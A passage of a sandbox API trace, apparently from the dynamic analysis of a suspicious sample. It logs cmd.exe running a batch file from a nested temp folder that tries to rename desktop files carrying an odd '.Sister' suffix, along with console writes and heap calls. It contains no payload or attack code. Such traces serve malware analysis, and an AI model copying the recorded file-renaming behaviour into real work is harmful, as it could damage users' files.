lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0294.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.093] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x19) returned 1 [0294.093] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.093] GetFileType (hFile=0x50) returned 0x2 [0294.093] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.094] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0294.094] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.094] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93a05d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93a05d0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0294.095] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0294.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.095] GetFileType (hFile=0x50) returned 0x2 [0294.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.095] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0294.095] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.095] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0294.100] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0294.100] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.100] GetFileType (hFile=0x50) returned 0x2 [0294.100] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0294.100] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0294.103] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.103] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0294.108] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0294.109] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0294.109] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0294.109] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.109] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.109] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0294.109] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0294.109] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0294.109] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0294.109] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0294.109] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0294.109] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0294.109] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0294.109] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0294.109] ??_V@YAXPEAX@Z () returned 0x1 [0294.109] GetProcessHeap () returned 0x21ed8c70000 [0294.109] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e8e0 [0294.110] GetProcessHeap () returned 0x21ed8c70000 [0294.110] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e8e0, Size=0x130) returned 0x21ed8d2d2d0 [0294.110] GetProcessHeap () returned 0x21ed8c70000 [0294.110] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2d2d0) returned 0x130 [0294.110] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.110] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.110] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.110] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0294.110] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda0e0040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0294.117] ??_V@YAXPEAX@Z () returned 0x1 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2d550 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eb40 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eb40, Size=0x130) returned 0x21ed8d2db90 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2db90) returned 0x130 [0294.118] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.118] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc76c0 [0294.118] GetProcessHeap () returned 0x21ed8c70000 [0294.118] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9303570 [0294.118] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0294.119] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0294.119] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.119] GetLastError () returned 0x2 [0294.119] GetProcessHeap () returned 0x21ed8c70000 [0294.119] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93a2ab0 [0294.119] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93a2ac0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0294.119] SetErrorMode (uMode=0x0) returned 0x0 [0294.119] SetErrorMode (uMode=0x1) returned 0x0 [0294.119] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda0e0040, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0294.119] SetErrorMode (uMode=0x0) returned 0x1 [0294.120] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0294.120] GetProcessHeap () returned 0x21ed8c70000 [0294.120] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93037e0 [0294.120] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0294.120] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0294.120] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.120] GetLastError () returned 0x2 [0294.120] ??_V@YAXPEAX@Z () returned 0x1 [0294.120] malloc (_Size=0xffce) returned 0x21eda0e0040 [0294.120] ??_V@YAXPEAX@Z () returned 0x21eda0e0040 [0294.120] malloc (_Size=0xffce) returned 0x21eda0f0020 [0294.120] ??_V@YAXPEAX@Z () returned 0x21eda0f0020 [0294.120] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0294.120] GetLastError () returned 0x2 [0294.121] _get_osfhandle (_FileHandle=2) returned 0x54 [0294.121] GetFileType (hFile=0x54) returned 0x2 [0294.121] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0294.121] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0294.122] _get_osfhandle (_FileHandle=2) returned 0x54 [0294.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0294.123] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0294.123] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0294.123] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0294.129] longjmp () [0294.129] ??_V@YAXPEAX@Z () returned 0x1 [0294.129] FindNextFileW (in: hFindFile=0x21ed8c7d0c0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="v9e3P.bmp", cAlternateFileName="")) returned 0 [0294.129] GetLastError () returned 0x12 [0294.129] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0294.130] GetProcessHeap () returned 0x21ed8c70000 [0294.130] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c956c0) returned 1 [0294.130] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.130] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0294.131] _get_osfhandle (_FileHandle=1) returned 0x50 [0294.131] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0294.131] _get_osfhandle (_FileHandle=0) returned 0x4c [0294.131] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0294.131] SetConsoleInputExeNameW () returned 0x1 [0294.131] GetConsoleOutputCP () returned 0x1b5 [0294.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0294.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0294.132] ??_V@YAXPEAX@Z () returned 0x1 [0294.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0294.133] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0294.133] _get_osfhandle (_FileHandle=3) returned 0x98 [0294.133] SetFilePointer (in: hFile=0x98, lDistanceToMove=701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2bd [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.133] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93037e0) returned 1 [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.133] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93a2ab0) returned 1 [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.133] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9303570) returned 1 [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.133] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc76c0) returned 1 [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.133] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2db90) returned 1 [0294.133] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d550) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2d2d0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67a30) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bcf0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bc30) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b7b0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93a0600) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93a05c0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b6f0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8020) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93048f0) returned 1 [0294.134] GetProcessHeap () returned 0x21ed8c70000 [0294.134] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93905d0) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9305790) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7fc0) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc84a0) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7ea0) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7a20) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45c20) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e30) returned 1 [0294.137] GetProcessHeap () returned 0x21ed8c70000 [0294.137] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93904b0) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9390470) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93901d0) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93900b0) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9390070) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.138] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9305c70) returned 1 [0294.138] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9368410) returned 1 [0294.139] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9303f30) returned 1 [0294.139] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7780) returned 1 [0294.139] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d2dcd0) returned 1 [0294.139] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56e20) returned 1 [0294.139] GetProcessHeap () returned 0x21ed8c70000 [0294.139] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56ce0) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67430) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937bb70) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b630) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b3f0) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9367f70) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9367f30) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b330) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7660) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9305a00) returned 1 [0294.140] GetProcessHeap () returned 0x21ed8c70000 [0294.140] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357f40) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9302e20) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7c00) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72830) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65cf0) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c72790) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8710) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bf30) returned 1 [0294.142] GetProcessHeap () returned 0x21ed8c70000 [0294.142] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357d40) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357d00) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357a60) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c0c0) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357860) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9357820) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9303a50) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9347830) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93052b0) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7600) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56a60) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56920) returned 1 [0294.143] GetProcessHeap () returned 0x21ed8c70000 [0294.143] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d56560) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d677b0) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cef0) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937cb30) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ca70) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9347390) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9347350) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937c9b0) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc83e0) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9303090) returned 1 [0294.144] GetProcessHeap () returned 0x21ed8c70000 [0294.144] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9337360) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9305040) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8380) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63d90) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63ee0) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64180) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0294.146] GetProcessHeap () returned 0x21ed8c70000 [0294.146] 